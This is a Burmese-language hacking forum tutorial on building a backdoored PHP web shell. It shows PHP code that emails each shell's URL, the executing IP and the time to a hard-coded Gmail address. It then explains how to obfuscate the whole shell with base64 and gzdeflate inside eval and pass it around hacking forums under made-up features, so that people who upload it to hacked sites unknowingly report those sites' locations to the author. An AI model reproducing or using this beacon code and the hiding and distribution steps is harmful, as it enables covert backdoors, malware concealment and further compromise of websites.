How to Make a Backdoor shell To Fool hackers (MHU)

လြယ္လြယ္ေလးပါ .. backdoor shell တစ္ခုေတြ ့မိလို ့ .. trick ေလးေဝမွ်ခ်င္လို ့ပါ . { ဟိဟိ ဒီတစ္ခါ တကယ္ျကီးကို backdoor shell ပါခင္ညာ.. . mail နဲ ့စမ္းသပ္ပီးပါေျကာင္း }

shell code က .... ရွည္ေတာ့ pastebin ေပါ္တင္ထားပါတယ္.. ဒီမွာပါခင္ဗ်ာ.

အဲ့ကုဒ္က မူရင္းကုဒ္ကို decode လုပ္ထားတာပါ .. အဲ့ code ထဲကမွ ...

Code:

$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'coachstrikers@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);

အေပါ္ကကုဒ္ေလးကေတာ့ backdoor အေနနဲ ့ link ကို email ဆီပို ့ေပးပါလိမ့္မယ္ .. ဟက္ကာတေကာင္ေကာင္က ဒီ shell ကို အသံုးျပုလိုက္တာနဲ ့... backdoor ကေနတဆင့္ က်ေနာ္တို ့က သူ ့ရဲ ့ shell link ကို ဒူးနန္ ့ျပီး. ယူသံုးယံုပဲေပါ့ . ဟိဟိ ...

အဲ့ေတာ့ အေပါ္က email ေနရာမွာ မိမိ email ကိုေျပာင္းထည့္လိုက္ပါ ... ျပီးရင္ ဒီ source code တစ္ခုလံုးကို decode လုပ္ရတာ ခက္ခဲသြားေအာင္ ... ဒီဆိုက္ဒ္ ကိုဖြင့္လိုက္ပါ.

ဆိုက္ဒ္ကိုဖြင့္ျပီးလွ်င္ သူေပးထားတဲ့ box ထဲမွာ မိမိရဲ ့ source code ကိုထည့္ရမွာျဖစ္ပါတယ္.. တစ္ခုသတိထားရမွာက php အဖြင့္အပိတ္ကို မထည့္ရပါဖူး .. ျကားထဲက ကုဒ္ေတြကိုပဲယူပါမယ္... eg..

Code:

<?php
function showMessage() {
       echo "MHU";
    }
    showMessage();     
?>

အနီျပထားတဲ့ အဖြင့္အပိတ္ကို မထည့္ရပါဖူး ခင္ဗ်ာ .. ဒါေလးက ဥပမာပါ .. ကဲ ဆက္လုပ္လိုက္ျကရေအာင္. ခုနက က်ေနာ္တို ့ email အစားထိုးထားတဲ့ backdoor source code ကို Input Code box ထဲကိုထည့္လိုက္ပါ.. ျပီးလွ်င္ Select nested functions ထဲကမွ အေပါ္ဆံုး base64_encode(gzdeflate('Code')) ကိုပဲေရြးခ်ယ္ပါမယ္.. ဒီေလာက္ဆိုလံုေလာက္ပါတယ္ . ကဲခု က်ေနာ္တို ့ဒီလိုလုပ္လိုက္တာကို obfuscated php လို ့ေခါ္ပါတယ္.

Output obfuscated code:

ဒီလိုေလး encoded အေနနဲ ့ထြက္လာပါလိမ့္မယ္ ..

Code:

<?php
eval(gzinflate(base64_decode('xxxxxxxxxx Your obfculated Php code xxxxxxxxxx')));
?>

ထဲမွာ output result code ေတြထြက္လာပါျပီ.. select all လုပ္ျပီး php ဖိုင္တစ္ခုအေနနဲ ့ notepad ကပဲျဖစ္ျဖစ္ .. မိမိ pc ထဲမွာသိမ္းထားေပါ့ ...

trick အေနနဲ ့ကေတာ့ hacking forum / community / blog ေတြမွာ ဒီ shell ကို ျဖန့္ဖို ့ပါပဲ. inj3ct0r shell , special function က priv8 symlink bypass, auto cpanel crack ဆိုပီး .. hacker ေတြသံုးခ်င္လာေအာင္ ျမူစြယ္ရပါမယ္. ..

တေယာက္ေယာက္က အဲ့ shell ကို သူ hacked ထားတဲ့ site ေပါ္တင္ပီး .. shell ထဲ login ဝင္လိုက္တာနဲ ့မိမိ email ထဲကို လင့္ေလးေရာက္လာပါလိမ့္မယ္.. ေအးေဆးပဲေပါ့ ... ဟီး..

[ php ကို obfuscated လုပ္တာ ျပန္ေဖာ္ဖို ့ခက္မယ္လို ့က်ေနာ္ထင္ပါတယ္. ေသခ်ာေတာ့မေျပာတတ္ဖူးေပါ့ . သူ ့မူရင္းက base 64 နဲ ့ encode လုပ္ထားတာပါ. က်ေနာ္ကေတာ့ php obfuscate လုပ္လိုက္ပါတယ္. source code ေဖာ္ရခက္ခဲျပီး.. သူ ့ default login password ျဖစ္တဲ့ inj3ct0r ကိုလည္း စိတ္ျကိုက္ ခ်ိန္းလို ့မရေတာ့ပါဖူး. ]

:::Testing & works proof:::by me

Click this bar to view the original image of 1012x448px.

ခု shell ေလးကို အထင္ေတာ့မေသးနဲ ့ inbox mailer ဗ်.. ခုပံုမွာေတာ့ ဖ်က္ထားေတာ့ Trash ထဲေရာက္ေနတာပါ. ရိုးရိုးတန္းတန္း ဆိုရင္ေတာ inbox ထဲကို ကြက္စတိ လာပါလိမ့္မယ္ ခင္ဗ်ာ...

ဟီး.. ဒီနည္းက ကတံုးေပါ္ထိပ္ကြက္သလို .. သူခိုးလက္က သူဝွက္လုတာပါပဲ . ေသခ်ာတာကေတာ့ ေခါင္းလည္းစားစရာမရွိဖူး. ေခြ်းမထြက္ မပင္ပန္းဘဲနဲ ့ mail ထဲ လာမယ့္ shell link ေတြကို email စစ္ပီး ထုိင္ collect လုပ္ယံုေလးပါပဲခင္ဗ်ာ.......ခိခိ... happy backdooring .